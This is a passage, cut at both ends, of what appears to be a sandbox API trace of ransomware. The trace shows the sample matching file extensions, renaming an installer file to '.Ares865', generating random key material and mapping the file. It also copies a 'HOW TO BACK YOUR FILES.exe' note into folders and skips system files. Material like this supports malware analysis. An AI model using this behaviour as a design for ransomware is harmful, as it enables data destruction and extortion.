(lpString1="msi", lpString2="ndf") returned -1 [0083.012] lstrlenW (lpString="nnt") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0083.012] lstrlenW (lpString="nrmlib") returned 6 [0083.012] lstrcmpiW (lpString1="86.msi", lpString2="nrmlib") returned -1 [0083.012] lstrlenW (lpString="ns2") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0083.012] lstrlenW (lpString="ns3") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0083.012] lstrlenW (lpString="ns4") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0083.012] lstrlenW (lpString="nsf") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0083.012] lstrlenW (lpString="nv") returned 2 [0083.012] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0083.012] lstrlenW (lpString="nv2") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0083.012] lstrlenW (lpString="nwdb") returned 4 [0083.012] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0083.012] lstrlenW (lpString="nyf") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0083.013] lstrlenW (lpString="odb") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0083.013] lstrlenW (lpString="odb") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0083.013] lstrlenW (lpString="oqy") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0083.013] lstrlenW (lpString="ora") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0083.013] lstrlenW (lpString="orx") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0083.013] lstrlenW (lpString="owc") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0083.013] lstrlenW (lpString="p96") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0083.013] lstrlenW (lpString="p97") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0083.013] lstrlenW (lpString="pan") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0083.013] lstrlenW (lpString="pdb") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0083.013] lstrlenW (lpString="pdm") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0083.013] lstrlenW (lpString="pnz") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0083.013] lstrlenW (lpString="qry") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0083.013] lstrlenW (lpString="qvd") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0083.013] lstrlenW (lpString="rbf") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0083.013] lstrlenW (lpString="rctd") returned 4 [0083.013] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0083.013] lstrlenW (lpString="rod") returned 3 [0083.013] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0083.013] lstrlenW (lpString="rodx") returned 4 [0083.013] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0083.013] lstrlenW (lpString="rpd") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0083.014] lstrlenW (lpString="rsd") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0083.014] lstrlenW (lpString="sas7bdat") returned 8 [0083.014] lstrcmpiW (lpString1="_x86.msi", lpString2="sas7bdat") returned -1 [0083.014] lstrlenW (lpString="sbf") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0083.014] lstrlenW (lpString="scx") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0083.014] lstrlenW (lpString="sdb") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0083.014] lstrlenW (lpString="sdc") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0083.014] lstrlenW (lpString="sdf") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0083.014] lstrlenW (lpString="sis") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0083.014] lstrlenW (lpString="spq") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0083.014] lstrlenW (lpString="te") returned 2 [0083.014] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0083.014] lstrlenW (lpString="teacher") returned 7 [0083.014] lstrcmpiW (lpString1="x86.msi", lpString2="teacher") returned 1 [0083.014] lstrlenW (lpString="tmd") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0083.014] lstrlenW (lpString="tps") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0083.014] lstrlenW (lpString="trc") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0083.014] lstrlenW (lpString="trc") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0083.014] lstrlenW (lpString="trm") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0083.014] lstrlenW (lpString="udb") returned 3 [0083.014] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0083.014] lstrlenW (lpString="udl") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0083.015] lstrlenW (lpString="usr") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0083.015] lstrlenW (lpString="v12") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0083.015] lstrlenW (lpString="vis") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0083.015] lstrlenW (lpString="vpd") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0083.015] lstrlenW (lpString="vvv") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0083.015] lstrlenW (lpString="wdb") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0083.015] lstrlenW (lpString="wmdb") returned 4 [0083.015] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0083.015] lstrlenW (lpString="wrk") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0083.015] lstrlenW (lpString="xdb") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0083.015] lstrlenW (lpString="xld") returned 3 [0083.015] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0083.015] lstrlenW (lpString="xmlff") returned 5 [0083.015] lstrcmpiW (lpString1="6.msi", lpString2="xmlff") returned -1 [0083.015] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865") returned 146 [0083.015] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.ares865"), dwFlags=0x1) returned 1 [0083.016] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143360) returned 1 [0083.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.017] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.018] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.018] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.018] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23300, lpName=0x0) returned 0x15c [0083.020] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23300) returned 0x420000 [0083.028] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.028] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.028] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.028] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.029] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.029] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.029] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.029] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.029] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.029] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0083.030] CloseHandle (hObject=0x15c) returned 1 [0083.030] CloseHandle (hObject=0x118) returned 1 [0083.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.031] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0083.031] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.032] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0083.032] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0083.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0083.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0083.032] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned 73 [0083.032] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" | out: lpString1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0083.032] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.032] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.032] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.033] GetLastError () returned 0x0 [0083.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.033] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.033] CloseHandle (hObject=0x120) returned 1 [0083.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.033] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.033] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0083.033] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.033] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.033] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.033] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.033] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.033] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.033] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.033] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.033] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2a3960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.033] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.033] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0083.033] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.033] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0083.033] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0083.033] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0083.033] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0083.034] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0083.034] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0083.034] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0083.034] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0083.034] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0083.034] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0083.034] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0083.034] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0083.034] lstrlenW (lpString="packages") returned 8 [0083.034] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*") returned 75 [0083.034] lstrcpyW (in: lpString1=0x2cce494, lpString2="packages" | out: lpString1="packages") returned="packages" [0083.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0083.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e2710 [0083.034] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0083.034] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0083.034] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.034] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0083.034] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0083.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0083.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0083.034] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned 82 [0083.034] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0083.034] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.034] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.035] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.035] GetLastError () returned 0x0 [0083.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.035] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.035] CloseHandle (hObject=0x120) returned 1 [0083.035] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.035] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.035] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0083.035] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.035] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.035] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.035] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.036] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.036] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.036] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.036] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.036] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2a3960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.036] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.036] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="aoldtz.exe") returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2=".") returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="..") returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="windows") returned -1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="bootmgr") returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="temp") returned -1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="pagefile.sys") returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="boot") returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="ids.txt") returned 1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="ntuser.dat") returned 1 [0083.036] 